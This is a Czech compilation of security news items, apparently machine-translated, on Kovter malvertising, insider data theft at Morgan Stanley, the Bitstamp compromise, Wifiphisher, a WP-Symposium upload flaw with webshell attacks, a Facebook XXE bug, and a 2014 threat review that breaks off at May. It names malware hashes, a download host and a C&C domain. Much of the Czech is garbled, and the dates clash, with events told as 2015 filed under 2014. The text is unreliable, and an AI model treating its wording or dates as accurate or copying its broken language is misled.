"Cílem tohoto útoku je nainstalovat škodlivý binární - novou variantu Trojan, z rodiny Kovter. (SHA1: eec439cb201d12d7befe5482e8a36eeb52206d6f). Malware byl stažen z indus.qgettingrinchwithebooks.babia-gora.pl:8080, to byl un-šifrované binární. Po vykonání se připojí k a16-kite.pw pro CNC. Vykonává injekčním jeho užitečné zatížení do plodil svchost.exe procesu, "říkají vědci.
Výzkumníci Cyphort se dostal do kontaktu s zneužívání týmu na AOL a zaútočí zastavili brzy po.
"My vyostřila tuto otázku na bezpečnostní tým AOL ( advertising.com infekce). Jsou vyšetřuje. Nemluvili jsme na Huffington Post a desítek dalších infikovaných webových stránek, ale přesto. Krátce poté, co jsme upozorněni, AOL, útok přestal, " Nick Bilogorskiy, Cyphort výzkumník, píše se v prohlášení.
Morgan Stanley Insider Theft ovlivňuje desetinu Wealth Management klientů
7.1.2014 Incidenty
Finanční služby gigant Morgan Stanley včera oznámil, že tento zaměstnanec ukradl citlivé informace týkající se více než 900 klientů bohatství pro řízení firmy.
Podle tiskové zprávy společnosti, správy majetku zaměstnanec otázku "byl ukončen." Kromě toho, Morgan Stanley tvrdí, že kontaktoval příslušnou vymáhání práva a regulační orgány. Orgánů činných v trestním řízení jsou v současné době vyšetřuje záležitost.
Ukradl data jsou řekl, aby zahrnoval názvy účtů a čísla a telefonní čísla, ale ne hesla, údaje o kreditní kartě nebo číslo sociálního zabezpečení.
Osoba seznámí s záležitost vysvětlil Threatpost, že Morgan Stanley se domnívá, že zaměstnanec pro správu majetku, který ukradl informace s cílem prodat na internetu. Tato osoba také vysvětlil, že zaměstnanec ukradl informace z interních systémů, a že krádež zapojen žádný externí hacking. Samo o sobě, zdroj poznamenat, ukradené informace nemohly být použity ukrást skutečné peníze z některého z postižených zákazníků.
Krádež Insider Morgan Stanley postihlo některé deset procent klientů správy majetku společnosti
Tweet
K tomuto bodu, tam byl žádný důkaz o každého klienta trpí jakoukoliv hospodářskou škodu, Morgan Stanley tvrdil. Firma tvrdí, že je v procesu kontaktování postižené klienty, a to je také o zavedení zesílených bezpečnostních postupů včetně sledování podvodům v impaktovaných účtech.
Klienti wealth management, jsou ty, které slouží k zajištění cenných papírů a řízení cash účet u Morgan Stanley. Asi deset procent z Morgan Stanley klientů správy majetku se podílejí na krádeži.
Argument pro pohyb SSH off portu 22
6.1.2014 Bezpečnost
Zajímavá diskuse se děje na Reddit na tom, zda Secure Shell (SSH), by měly být nasazeny na jiném základě než 22 přístavu, aby se snížila pravděpodobnost, že bude ohrožena. Jedna zajímavá poznámka je, že bezpečnost by neznáma není bezpečnostní opatření, ale způsob, jak oddálit útočníka, takže poskytuje jen malou hodnotu. I když je pravda, že je obtížné zastavit rozhodný útočníkovi, který je cílení vás, žádné opatření, které zastaví náhodné skript kiddies a skenery z tropit si SSH není úplně k ničemu.
Pravdou je, že jsem byl nasazení SSH na nestandardním portu (typicky 52222) za více než 15 let na internetu čelí servery se mi podaří. Samozřejmě, že to není jen bezpečnostní opatření I zaměstnat. I náplast denně; použijte hosts.allow kde praktické, klíče a fráze místo hesel a nasazení DenyHosts . Mám nasadit na nestandardním portu, protože z bezpečnostních výhod, aby se měl o bezpečnosti by zapomnění? Ale vůbec ne! Nasadit SSH na nestandardním portu, protože eliminuje hluk, který je každý přítomný na portu 22. kontinuální skenování a pokus o brutální nutí SSH, který byl na internetu od počátku času, a zdá se zhorší každý rok, vytváří spoustu hluku v protokolech a je v nejlepším případě obtíž, a v nejhorším služby týkající se pro server. Proč se smířit s tím, pokud nemáte to?
To snižuje hlasitost natolik, že jsem se často vyzkoušet své obrany, aby se ujistili, že jsou funkční. Někdy se dokonce nasadit HoneyPot na portu 22, aby viděli, co protivníci jsou až.
Bitcoin výměně Bitstamp pozastavuje služby v důsledku kompromisu
6.1.2014 Riziko
UK-založené výměna Bitcoin Bitstamp dočasně přerušila svou službu v důsledku útoku. "Máme důvod se domnívat, že jeden z operačních peněženek Bitstamp byla ohrožena na 04.1.2015," sdíleli na internetových stránkách Exhange se. "Z hlediska zabezpečení opatření proti kompromisů Bitstamp zachovává pouze malou část zákazníků bitcoins v on-line systému. Bitstamp udržuje více než dost off rezerv na pokrytí narušit bitcoins, "oni znovu ujištěni, uživatele a vyzvala je, aby provádět vklady na již dříve vydané Bitcoin vkladů adres. "klientských vkladů vyrobené před 5.1.2015 09:00 UTC jsou plně pokryty Bitstamp je rezervami. Vklady na nově vydané adres, který poskytuje po 05.01.2015 09:00 UTC může být poctěn, "poznamenal oni. Oni se rozhodli pozastavit servisní chvíli vyšetřování probíhá, oznámili, když CEO společnosti Nejc Kodric snažil ujistit zákazníky, že jejich Bitcoin je uložen v chladném skladu (na systémech off), a proto, trezor, toto není dost, aby zabránila jejich starosti a ze strachu opakování z Mt. GOX katastrofa , podle Silicon Úhel , uživatelé si stěžovali na problémy s odstoupením s Bitstamp minulý týden, a firma zřejmě nebyl reagovat na podporu vstupenky v té době. Začátkem tohoto roku, je Bitstamp byl zasažen se a přežil DDoS útok.
Phish out heslo sítě WPA "s Wifiphisher
6.1.2014 Phishing
Řecký počítačový mág George Chatzisofroniou vydala stabilní verzi Wifiphisher , nástroj zaměřený na automatizaci phishing útoky proti WPA sítí s cílem objevit heslo potřebné pro přístup k nim. Nástroj odpojí uživatele připojené k zabezpečené bezdrátové sítě a přístupovým bodem zasláním pakety de-autentizace z AP ke klientovi, a naopak. To pak zosobňuje AP kopírováním jeho nastavení. Když se oběti pokusu o připojení k síti znovu, je pravděpodobné, že si nevšiml pravou podstatu pirátského přístupového bodu. "Wifiphisher využívá minimální webový server, který reaguje na HTTP a HTTPS požadavky , "vysvětluje Chatzisofroniou. "Jakmile se oběť vyžádá stránku z Internetu, Wifiphisher bude reagovat s realistickým falešnou stránku, která žádá o potvrzení, WPA hesla kvůli upgradu firmware routeru."
Po odeslání dispozici na internetové stránce phishing, heslo dozví útočníkem. Technicky, on nebo ona může přinést další phishingové stránky, na oběti, například pro populární web mailové služby a sociálních sítí. software pracuje na Kali Linux. Útočník by také potřebovat dva bezdrátové síťové rozhraní, jeden schopný injekce.
Skandinávské banky hit s DDoS útoky
6.1.2014 Počítačový útok
Nový rok začal špatně pro finský bankovní OP Pohjola Group a jejími zákazníky: poslední bylo zabráněno realizaci svých on-line bankovní transakce pomocí DDoS útoku, která se zaměřovala na služby banky on-line začíná v poslední den roku 2014, "služby OP objevily určité problémy Na Silvestra kvůli datových komunikačních výpadků. Tyto výpadky byly způsobeny denial-of-služeb útoku. Útok zaplavila datové komunikační systémy OP a zabránit bankovnictví zákazníků. Během přerušení, on-line služby jsou k dispozici, a výběry hotovosti nemohl být vyrobeny z bankomatů. Tam byl také některé obtíže při platbách kartou, "banka sdílené na druhý den útoku. "Výpadek byl zjištěn na asi 16,30 na Silvestra, začal znovu fungovat v době Služby a byly zcela obnoven a zákazníkům k dispozici po půlnoci. Nicméně další narušení jsou možné, protože byla přijata nápravná opatření jsou stále probíhají a úroveň zabezpečení datového provozu byla vznesena v současné době. Zákazníci v zahraničí, přesto mohou mít potíže s přihlášením do služby OP pro on-line ". Útok je stále probíhá, a služby OP byli ne jediný cíl . Finská divize banky Nordea a dánský Danske Bank zažila i on-line služby zpomalení nebo narušení. Zatímco ten druhý je ještě aby se vyjádřil k otázce, Nordea potvrdil, že se stávají terčem neznámých DDoS útočníky a volali policii, aby prošetřila, příčinou útoku je stále neznámý, říkali. Zákazníci Nordea byly stále moci používat on-line bankovnictví, ale služba byla zpomaluje. Zákazníci OP Pohjola Group, na druhé straně, nemohli využívat službu zcela po mnoho hodin, během posledních šesti dnů, protože v bance podařilo obnovit občas. Ty, spolu s jeho servisní společnost Tieto, spolupracujeme s úřady a vyšetřování útoku. Do té doby, banka zřídila několik telefonních služeb, které mohou být použity zákazníci, kteří nemají přístup k jejich on-line služby a mají naléhavou bankovnictví. Oni se také zavázali kompenzovat zákazníkům žádné poplatky, které mnozí z nich vzniklé a škody, které mohou mít utrpěly v důsledku jejich neschopnosti přístup ke službám banky on-line během útoku.
Počet kybernetických útoků na maloobchodníky klesne o polovinu
6.1.2014 Počítačový útok
Přes 50 procent poklesu počtu útoků proti maloobchodníků v USA, počet záznamů ukradených z nich zůstává blízko rekordních maximech. Výzkumníci IBM zabezpečení uvádějí, že v roce 2014, kybernetické útočníci ještě podařilo ukrást více než 61 milionů záznamů z prodejců i přes pokles počtu útoků, což dokazuje zvyšující se složitosti Kyberzločinci a efektivitu.
"Hrozba ze strany organizovaných kroužků počítačové kriminality zůstává největší bezpečnostní výzvou pro maloobchodníky," řekl Kris Lovejoy, generální ředitel IBM Security Services. "Je nezbytné, aby vedoucí do cenných papírů a CISO zejména, používat jejich rostoucí vliv, aby bylo zajištěno, že mají ty správné lidi, procesy a technologie na místě, aby se na tyto rostoucí hrozby." Černý pátek a kybernetické pondělí fotoaparát Cyber útočníci snížila svou činnost ve všech odvětvích na Černý pátek a Cyber pondělí , spíše než přijetí opatření. Při pohledu na dvou týdnů (listopad 24 - 5.prosince) kolem těchto dnech údaje ukazují na následující aktivitu napříč všemi odvětvími:
Počet denních kybernetických útoků bylo 3043, téměř o třetinu nižší, než je průměr 4200 v tomto období v roce 2013.
Od roku 2013 a 2014, se počet porušení klesl o více než 50 procent na Černý pátek a Cyber pondělí.
V roce 2013 bylo více než 20 porušení zveřejněny, včetně několika velkých narušení, které způsobily počet záznamů ohrožení roste drasticky, dosahující téměř 4 miliony.
Za stejné období v roce 2014, 10 porušení bylo popsáno, které mělo za následek jen něco málo přes 72.000 záznamů dostat ohrožena.
Přesto cyber hrozba zpomalit, maloobchodní a velkoobchodní průmyslu se jeví jako nejvyšší průmyslu cíl pro útočníky v roce 2014, což je potenciální výsledek vlny nedávných vysokých profilových incidentů, které mají dopad značkových prodejců. Za dva roky před, výroba řadí na první místo mezi top pěti zaútočili průmyslu, zatímco maloobchodní a velkoobchodní průmyslu na posledním místě. Minulý rok, primární způsob útoku byl neoprávněný přístup a konkrétněji Secure Shell Brute Force útoky, které vysoce převyšoval škodlivý kód, nejlepší volba v roce 2012 a 2013. Nahoru porušení zastíní rostoucí trend Útočníci zajištěna více než 61 milionů záznamů v roce 2014, se z téměř 73 milionů v roce 2013. Nicméně, když se data zúžen pouze o událostech, které se týkají méně než 10 milionů záznamů (což Vyloučí prvních dvou útocích nad tomto časovém rámci, Target Corporation a Home Depot ), údaje ukazují jiný příběh:, počet maloobchodních záznamů ohrožení v roce 2014 zvýšil o více než 43 procent více než 2013 sofistikované metody útoku sice došlo nárůst počtu Point of Sale (POS) malware útoky, drtivá většina incidentů zaměřených na maloobchodní sektor podílí Command Injection nebo SQL injection, složitost SQL nasazení a nedostatek potvrzení údajů provádějí správci zabezpečení z retailové databází primární cíl. Přes 2014, tato metoda Command Injection byla použita v téměř 6000 útoků proti prodejců. Mezi další metody patří Shellshock stejně jako POS malwaru, jako jsou BlackPOS, Dexter, vSkimmer, Alina a Citadela.
Skryté nebezpečí kódu třetích stran, ve svobodných aplikací
6.1.2014 Hrozby
Výzkum z MWR Infosecurity ukázala různé způsoby, jak mohou hackeři zneužívají reklamní sítě tím, že využívá zranitelnosti v zdarma mobilní aplikace. Když lidé instalovat a používat bezplatné aplikace - víc než placených aplikací - mohou být předává své adresáře, obsah jejich SMS , e-mailem nebo v některých případech, rozdávat plnou kontrolu nad jejich zařízení. Je to proto, že z privilegovaného kódu vstřikované do aplikací, které inzerenti a třetí strany používají pro sledování. Takže zatímco uživatelé mohou důvěřovat vývojáře aplikace, aplikace kód vložený inzerenty může zavést napadání útočníci mohou využívat přístup ke svému zařízení pomocí aplikace. Reklamní sítě dědí všechna oprávnění a možnosti aplikace, která obsahuje kód sítě. V případě, že aplikace může vidět svoje fotky, může reklamní síť. Necháte-li aplikaci pro čtení a odesílání e-mailů, může, a tak na reklamní síť. To znamená, že pokud hackeři jsou úspěšné v pronikání bezpečnostních obranu reklamní sítě je, budou mít přístup ke stejným údajům stejně. Senior bezpečnostní výzkumník Robert Miller z MWR vysvětlil: "Většina mobilních zařízení obsahuje bezpečnostní model, který znamená, že běžící nemůže snadno zobrazit data z app B, a také nelze použít stejná oprávnění. Takže pokud aplikace je vidět vaši SMS a aplikace B nemůže app B nemůže žádat app pro vaši SMS. "Nicméně, pokud app a app B obsahují kód ze stejné reklamní síti, reklamní sítě může zobrazit vaše SMS, pokud si to přeje. Reklamní sítě ve skutečnosti obsahují tuto funkci, a to je jen "cross aplikace" dat. Pokud se útočníci vložit se do obrazu s využitím těchto zranitelností v kódování, je vysoce pravděpodobné, že k tomu, aby ukrást uživatelská data. " Pachatelé mohou ohrozit Apple a zařízení Android s využitím kódu vloženého do mobilní reklamy. Přitom inzerenti by mohl hrát nákupní seznam nečekaných akcí, k nimž patří:
Shromažďovat osobní a citlivé údaje (a vystavit jej odposloucháváním
Sledujte svou polohu pomocí GPS
Přístup fotografie a další soubory uložené v přístupných místech (například SD kartě na zařízeních se systémem Android)
Číst, psát a mazat soubory
Pošlete / čtení e-mailových a / nebo SMS zpráv
Telefonování
Zapnutí a používání kamery / mikrofonu
Dynamicky aktualizovat a instalovat kód / aplikace
Spustit libovolný příkazy.
Tam jsou klíčové rozdíly v mobilním sběru dat bylo dosaženo prostřednictvím reklamy ve srovnání s více tradičními reklamy webové stránky a varoval uživatele, musí být bdělá při udělování oprávnění mobilní aplikaci. "Mnohem přesnější lokalizační údaje mohou být zachyceny z mobilního zařízení prostřednictvím své GPS a některé aplikace vyžadují schopnost legitimně přístup ke kontaktům vlastník zařízení nebo informace adresáře, stejně jako fotografie," řekl Miller. "Spotřebitelé musejí pochopit hlediska ochrany životního prostředí systém mobilních aplikací. Zdarma aplikace jsou podporovány reklamní sítě, které obchodují v datech. Zatímco uživatelé nemusí platit pro tento šikovný použití v peněžním vyjádření, budou platit jejich informací. A to znamená, že uživatelská data je jen tak bezpečný jako reklamní síť. " "To, co jsme ukázali se, že vzhledem k zranitelné a privilegované reklamní kód, aplikace samotná byla podkopána," pokračoval. "inzerenti muset převzít větší odpovědnost za bezpečnost a uživatelů mezitím by měly být zdvojnásobení jejich ostražitost proti tomu příliš znuděný o nájmu aplikace přistupovat ke svým citlivým mobilní data. " Miller navrhl uživatelé by si měli přečíst oprávnění, že požaduje app před instalací. "Je smutné, že tam je zřídka možnost vybrat a vyberte oprávnění vám vyhovuje, takže pokud nesouhlasíte s některou z těchto oprávnění požadované, neinstalujte aplikace.
Spam se vrací na scén
5.1.2014 Spam
Phishingové útoky, které dříve zachycoval spamový filtr, se z ničeho nic dostávají až do doručené pošty zaměstnanců.
Jak by mohl být v současné době spam problémem pro správce zabezpečení? Už jsou to roky, co jsme všichni začali používat služby, které odvádějí fenomenální práci při filtrování reklamy na léky na předpis či exotické dovolené a odkládají ji do složek se spamem, kde se obvykle hromadí a již nikoho neobtěžují.
Až do minulého pátku jsem za posledních deset let nestrávil přemýšlením nad spamem snad ani pět minut, což je důkaz skutečné efektivity spamových filtrů. Koneckonců asi 98 % našich příchozích e-mailů je spam. Pokud bychom neměli účinné stroje pro filtrování spamu, dostal by každý zaměstnanec denně navíc 40 až 50 e-zpráv. A to by významně snížilo jejich produktivitu.
Asi proto, že se naši pracovníci již dlouho nesetkali se skutečným spamem, našeho právního zástupce vystrašilo, když začal v poslední době pravidelně dostávat zprávy, které považoval za nevyžádanou poštu.
Některé z nich mi přeposlal a chtěl vědět, co se děje. Tyto e-maily tvrdí, že jsou z organizací, jako je třeba FedEx, a na první pohled vypadají legitimně. Jen kontrola e-mailových hlaviček vám řekne, že je tomu jinak.
Některé zprávy obsahují odkazy na podezřelé weby v místech, jako jsou Čína a Rusko. Jiné zase zahrnují přílohy, které jsou údajně požadovanými certifikáty nebo e-faxovými dokumenty, ale ve skutečnosti jsou to soubory ZIP obsahující soubor EXE. Stručně řečeno – to není jen obyčejný spam, který je sice otravný a zahlcuje sítě, ale jinak je obvykle neškodný. Ne, toto jsou phishingové útoky.
Brzy si začali stěžovat na nárůst spamu i další lidé ve firmě. Jaktože jsem chtěl vědět, proč nedošlo k eliminaci těchto phishingových útoků a k ochraně schránek zaměstnanců?
Uvědomoval jsem si, že právě migrujeme uživatele do spravované e-mailové služby od Microsoftu a že se mluvilo o úspoře financí ukončením odběru antispamové služby našeho současného poskytovatele ve prospěch spamové prevence od Microsoftu, která je součástí jím poskytované služby.
Přechod s obtížemi
Myslel jsem si, že právě to je pravděpodobným zdrojem problému, a opravdu – mé podezření bylo správné.
Dříve jsme nejen dělali kontrolu příloh, ale také jsme omezovali typy příloh, které bylo možné doručovat. Používali jsme také řešení SPF (Sender Policy Framework), které zjišťovalo, zda jsou odesílatelé skutečně těmi, za koho se vydávají.
Když náš IT tým migroval e-mail na službu Microsoftu, zanedbal implementaci těchto důležitých bezpečnostních funkcí. Spam se tak pro mě v současné době stal záležitostí, kterou jsem musel začít řešit. Nyní totiž mohou zaměstnanci kliknout na přílohy nebo odkazy a spustit škodlivé programy.
Naštěstí náš software pro ochranu koncových bodů zabránil většině příloh způsobit škodu, ale detekce nebyla úplná. Proto náš bezpečnostní tým analyzuje zjištěné podezřelé e-mailové přílohy či odkazy a vytváří pravidla v nástroji SIEM, aby zjišťoval případy, kdy zaměstnanci klikli na některé z nich nebo si stáhli malware.
Nedávno jsme také zapli opravdu skvělou funkci Wildfire na firewallech Palo Alto Networks, která přesměruje spustitelné soubory do zabezpečené karantény, kde se zjišťuje, zda jsou škodlivé. Protože je to novinka, zprovoznili jsme jen monitorování událostí a zatím jsme neaktivovali blokování.
Již několikrát jsme museli rychle jednat, ale dosud jsme měli štěstí. Na základě zkoumání se ukázalo, že jedna příloha, kterou několik zaměstnanců spustilo, kontaktovala server v Číně, aby přes něj stáhla další software. Server naštěstí nebyl v provozu.
Nyní musíme nadále sledovat podezřelé aktivity a já musím zajistit bezpečnou implementaci naší současné e-mailové architektury.
WordPress Symposium Plug-In sužován souborů Nahrát chyby zabezpečení
2.1.2014 Zranitelnosti
Vzhledem k tomu, zpřístupnění vážné souboru nahrání zranitelnosti v WordPress sympozia a veřejnou dostupnost proof-of-concept kód zneužití, útoky proti lokalit se systémem plug-in se začínají zvyšovat obavy.
Výzkumníci z Trustwave SpiderLabs v úterý uvedlo, že ulovil několik pokusů využít v jejich honeypot, a výzkumníci na Sucuri byly monitorovací skeny pro plug-in od začátku měsíce, téměř dva týdny před 11.prosince zveřejnění by Italský vědec Claudio Viviani.
Tato chyba zabezpečení umožňuje útočníkovi vkládat bez ověření na stránky běží Symposium, SpiderLabs vedoucí výzkumník Ryan Barnett napsal v poradenství .
V jednom takovém využívat pokus, Barnett řekl útočník nahrál PHP soubor, který obsahoval různé PHP backdoor kód, jehož prostřednictvím hacker mohl poslat příkazy přes HTTP. Soubor také WSO webshell, který poskytuje vzdálený pohled do rozhraní pro správu serveru je.
Podle statistik WordPress, plug-in byl trochu staženo více než 150.000 krát, což je nesrovnatelně menší než některé z více populární plug-iny jako Aksimet (27 milionů stažení) a kontaktní formulář 7 (22000000). I přes relativně nízký počet stažení, veřejná dostupnost PHP kód zneužití a snadnost, ve kterém hackeři jsou schopni lokalizovat místa spuštěním zranitelné zásuvné-in zaslouží operátoři na místě vyhodnotí riziko.
"Konečným cílem většiny z těchto útočníků je instalace webshell / zadní vrátka, aby mohli mít přístup / kontrolu na webových stránkách," řekl Barnett Threatpost. "Sledují noví 0-day zranitelnosti využít, aby pak nainstalovat webshells. WP-Symposium je prostě "vuln dne."
WSO webshell se hackeři použit před cílem získat dálkové ovládání přes webové stránky; webshell umožňuje útočníkům vzdáleně číst a databází, spouštět příkazy na úrovni OS, nainstalujte drive-by download-malware vazby a dokonce útočit na jiné webové stránky, řekl Barnett.
Skládání problému je fakt, že i přes aktualizované verze plug-in jsou k dispozici, Barnett řekl problém přetrvává.
"Stáhnul jsem si nejnovější verzi kódu jak z webových stránek WordPress a přímo z wpsymposium místa , a ověří, že je stále zranitelný, "řekl Barnett.
Nejnovější verze WordPress sympozia z WordPress a WPSymposium stránkách jsou stále zranitelné.
Tweet
Barnett řekl, že ohrožené soubory, jsou také k dispozici na mobilní verzi. Tyto soubory jsou: /wp-symposium/server/php/index.php; /wp-symposium/server/php/UploadHandler.php; /wp-symposium/mobile-files/server/php/index.php; a /wp-symposium/mobile-files/server/php/UploadHandler.php.
Výzkumníci z Sucuri uvedlo, že byli schopni ověřit, podobné útoky proti stránek běžících sympozium. Sucuri hlásí nárůst internetových scanů pro plug-in začíná počátkem tohoto měsíce, a to zejména poté, co 11.prosince, kdy chyba byla veřejně známá. Počet skenů za den vyvrcholil v pondělí na téměř 3.800. Sucuri řekl, že první dva využije byl učiněn pokus o 1.prosince a 9.prosince, dva dny před zveřejněním.
"Někdo tam věděl o této chyby zabezpečení a aktivně se pokouší ji využít," napsal Sucuri David Dede v poradenství . "Ať už to bylo zveřejněno přes podzemní fór, jsou to právě ony, které ji nebo nějakým jiným způsobem nalezeny. Ať tak či onak, máme co do činění s aktivní 0 dnů zranitelnost. "
Platební karty vystaveny ve Možná Chik-fil-A data Porušení
2.1.2014 Hrozby
Je to už rok porušení dat , tak to má smysl pouze, že zprávy, vycházejícímu z porušení údajů na populární řetězce rychlého občerstvení, Chik-fil-A, by se objevil v posledních dnech v roce 2014.
Včera pozdě bezpečnost novinář Brian Krebs hlášeno , že anonymní zdroj v nejmenované finanční instituce mu řekl, že některé 9000 z platebních karet svých zákazníků přistál na seznamu výstrahy podvod. Jediným společným point-of-sale nákupy mezi těmito kartami se v Chik-fil-A. Zdroj pokračoval říci Krebs, že banka v otázce měli méně než 9000 platební karty ovlivněni loňské masivní Target porušení, což naznačuje, že údajný Chik-fil-A kompromis by mohl být velký.
Krebs hlásil, že slyší mumlání o možném porušení v Chik-fil-A v listopadu, ale že důkazy mizivé. Nicméně, kolem Vánoc, hlavní sdružení kreditní kartu vydal výstrahu týkající se porušení u nejmenovaného prodejce, která nastala mezi 02.12.2013 a 30.září, 2014. Nyní Krebs tvrdí, že některé instituce pozorovat podvodné činnosti, které lze vysledovat zpět na kuřecí-prodával rychlého občerstvení povolení.
V prohlášení vydaném na KrebsonSecurity.com, s Chik-fil-A mluvčího ani nepotvrdil, ani nevyvrátil porušení smlouvy, ale řekl, že obdržela zprávy od bank varováním porušení a záležitost vyšetřuje. V prohlášení dále uvedl, že v případě, že byl skutečně porušení platebních údajů, že držitelé karty by neměl být odpovědný za placení za podvodné poplatky a že společnosti by nabízet osobám postiženým služby ochrany zdarma identity.
Informace o platbě kartou potenciálně vystaveni možnému Chik-fil-A zneužití dat
Tweet
Pokud vyjde najevo, že Chik-fil-A utrpěl porušení, to dá rozum, že řetězec s rychlým občerstvením je point-of-sale infrastruktura byla pravděpodobně napaden nějakým typem RAM-škrabkou nebo Backoff-jako malware . Takový byl případ pro Target, Home Depot a mnoho z desítky dalších porušili prodejců letos.
Takže bezútěšný je stav point-of-prodeje cenného papíru, který US Secret Service vydaly poradenství v této věci na začátku tohoto roku . 2014 vydání Verizon dat Breach Investigation Report zahrnovala nelichotivý analýzu stavu point-of-prodeje bezpečnosti. Ve všech, společný konsensus je, že body-of-sale jsou špatně zabezpečené a čelí stále rostoucí-sofistikované útoky .
XXE Bug opravené na Facebooku Kariéra Third-Party Service
2.1.2014 Zranitelnosti
Zranitelnost byla objevena a záplatované ve službě třetí strany, která zpracovává životopisy na povolání stránce na Facebooku je.
Objev byl v hodnotě více než 6000 dolar na odměnu vyplatil Facebooku výzkumníka Mohamed Ramadan Egypta, který publikoval některé podrobnosti o zranitelnosti a využít na jeho internetových stránkách .
Ramadán řekl, že chyba je slepý XXE (XML externí subjekt) mimo pásmo chyby. To mu umožnilo nahrát DOCX soubor ke stránce kariéry s některými dalšími kódem, který nebyl prověřeni službou třetí strany.
Stránka kariéry přijímá pokračuje pouze ve formátu PDF nebo DOCX formátu. Ramadan řekl, že byl schopen použít program 7zip extrahovat obsah XML souboru DOCX, že si vytvořil. Ten otevřel soubor s názvem [Content_Types] .xml a vloží benigní kód, který mu nahrál na stránku. Kód, řekl, spojený s jeho python HTTP server o 15 minut později.
Ramadan řekl, že zatímco jeho útok kód byl neškodný, hacker mohl provádět libovolný počet škodlivých aktivit, včetně útoku denial-of-service na rozebrat systému, provádí prověřování TCP pomocí externích subjektů HTTP, získat neoprávněný přístup k datům uloženým as XML soubory, provádět denial-of-service útoky na jiných systémech, přečtěte si systém a soubory aplikací, spustit další kód, nebo pomocí připojené aplikace pro DDoS útoky.
Vzhledem k tomu, služby třetích stran, však nebyla součástí Facebook výrobního prostředí, uživatelských dat nebo Facebook zdrojový kód by neměl být ohrožen.
Není to poprvé, co Ramadan byl odměněn Facebook odměnu. V říjnu 2013 se našel zranitelnost v aplikace Facebook Messenger pro Android , která umožňuje jinou aplikaci na zařízení pro přístup k uživateli přístup k Facebooku žeton a převzít ji v úvahu, a podobné chyby ve Facebook Pages Manager pro Android, což je aplikace, která umožňuje administrátorům spravovat více účtů Facebook. Tato chyba umožňuje další aplikace chytit přístupový token uživatele.
Facebook se před řešit XXE chyby. V lednu se vyplácel 33500dolar kvantum do brazilské výzkumník, který našel XXE zabezpečení v Facebook je Zapomněli jste heslo služby . Ten oznámil XXE chybu a požádal o svolení Facebook vystupňovat ji do vzdáleného spuštění kódu chybu. Facebook se rychle záplatované, ale Silva sdílel jeho potenciál využít s bezpečnostním týmem na Facebooku, který se rozhodl, že si vysloužila velkou odměnu.
Největší počítačové a mobilní hrozby roku
1.1.2015 Mobil
Počítačoví piráti v roce 2014 rozhodně nelenili. Neuplynul prakticky týden, kdy by se neobjevila nová hrozba, podvodná internetová stránka nebo virus. Velmi často docházelo také k únikům citlivých osobních dat. Přinášíme přehled největších počítačových a mobilních hrozeb letošního roku.
LEDEN
Rozsáhlá krádež zakódovaných osobních identifikačních čísel (PIN) ke kreditním a debetním kartám, k níž došlo v předvánočních týdnech u amerického maloobchodního řetězce Target, zasáhla až 70 miliónů jeho zákazníků. Podrobnější informace zveřejnila firma v lednu.
V lednu německý Spolkový úřad pro bezpečnost v informační technice (BSI) oznámil, že odhalil krádež přístupových dat k 16 miliónům e-mailových účtů. Podle prvních informací se měla velká e-mailová krádež týkat z drtivé většiny pouze Němců, jak se ale později ukázalo, mezi postiženými uživateli bylo také nejméně 138 Čechů.
Ukázka ze hry Angry Birds
Tajné služby sbíraly osobní údaje o hráčích Angry Birds
Americká Národní agentura pro bezpečnost (NSA) a britská tajná služba GCHQ sbíraly osobní údaje i uživatelů mobilních aplikací, například populární hry Angry Birds. Napsal to americký deník The New York Times a britský The Guardian s odvoláním na dokumenty, které jim poskytl bývalý pracovník NSA Edward Snowden.
Některé účty elektronické pošty provozované americkou internetovou společností Yahoo se staly terčem útoku. Hackeři při něm ukradli některá uživatelská jména a hesla, která pak byla použita k získání osobních údajů o lidech, s nimiž si uživatelé zasažených účtů v nedávné době psali.
ÚNOR
Někteří tuzemští uživatelé se v únoru dopoledne potýkali se zpomalením internetového připojení. Důvodem byl útok typu Distributed Denial of Service (DDoS) na jednoho z největších telekomunikačních poskytovatelů v Česku – společnost GTS Czech.
Flappy Bird je fenoménem dnešní doby. Tato hra je ale zároveň i nedostatkovým zbožím, protože ji její tvůrce po vlně kritiky stáhl z internetových obchodů. Toho se snaží využít počítačoví piráti, kteří celosvětovou počítačovou sítí šíří kopie obsahující škodlivé kódy.
Počet škodlivých aplikací pro mobilní zařízení s operačním systémem Android se letos na konci ledna meziročně zvýšil zhruba o šestinu na deset miliónů. Uvedla to v únoru antivirová firma Kaspersky Lab.
Rozmachu chytrých telefonů jsou si vědomi i počítačoví piráti. Internetem tak koluje celá řada škodlivých mobilních aplikací, které jim pomáhají odsávat peníze z účtů jiných lidí. Podle únorové analýzy bezpečnostní společnosti Pandalabs se kyberzločincům podobným způsobem podařilo nakazit více než 300 000 zařízení s operačním systémem Android.
BŘEZEN
Krymský konflikt se rozšířil i do kyberprostoru. Stále častější hackerské útoky mezi Ruskem a Ukrajinou nenechávají chladnými ani české úřady. Situaci monitoruje Národní bezpečnostní úřad.
Opakovaným útokům čelily webové stránky ruského prezidentského úřadu. Vyřadit z provozu se počítačovým pirátům podařilo i stránky ruské centrální banky. Mluvčí Putinova úřadu nesdělila, kdo by mohl za útokem stát.
Kalifornský hacker, který nahrával nahé dívky pomocí jejich webových kamer a poté je vydíral, jde na rok a půl do vězení. Soud mu podle agentury Reuters udělil trest za vydírání a porušení soukromí desítek dívek, od nichž požadoval peníze výměnou za nezveřejnění citlivých záběrů. Mezi jeho oběťmi byla i loňská vítězka prestižní americké soutěže krásy mladých dívek Miss Teen USA, která byla jeho spolužačkou.
Historicky nejvyšší pokutu za šíření spamu uložil v březnu Úřad pro ochranu osobních údajů (ÚOOÚ). Za nevyžádaná obchodní sdělení tak společnost eMarketing CZ zaplatí 480 000 Kč.
DUBEN
Dvěma ze tří internetových uživatelů podle bezpečnostních expertů hrozí nebezpečí. Na vině je závažná bezpečnostní chyba knihovny OpenSSL, která patří k nejrozšířenějšímu kryptovacímu softwaru na internetu. Bezpečnostní experti proto vyzývají, aby si uživatelé neprodleně změnili svá hesla k e-mailu i dalším internetovým službám, a to včetně on-line bankovnictví.
Spolkový úřad pro bezpečnost v informační technice (BSI) odhalil obří e-mailovou krádež, při které se počítačovým pirátům podařilo získat přístupové údaje k více než 18 miliónům elektronických poštovních schránek.
Před nebezpečnou chybou populárního prohlížeče Internet Explorer varovala společnost Microsoft. Americký softwarový gigant tvrdí, že trhlinu mohou kyberzločinci zneužít k neoprávněnému přístupu k cizím počítačům a datům, která jsou v nich uložena.
Internet Explorer
Nebezpečná chyba Internet Exploreru ohrožovala desítky miliónů lidí
KVĚTEN
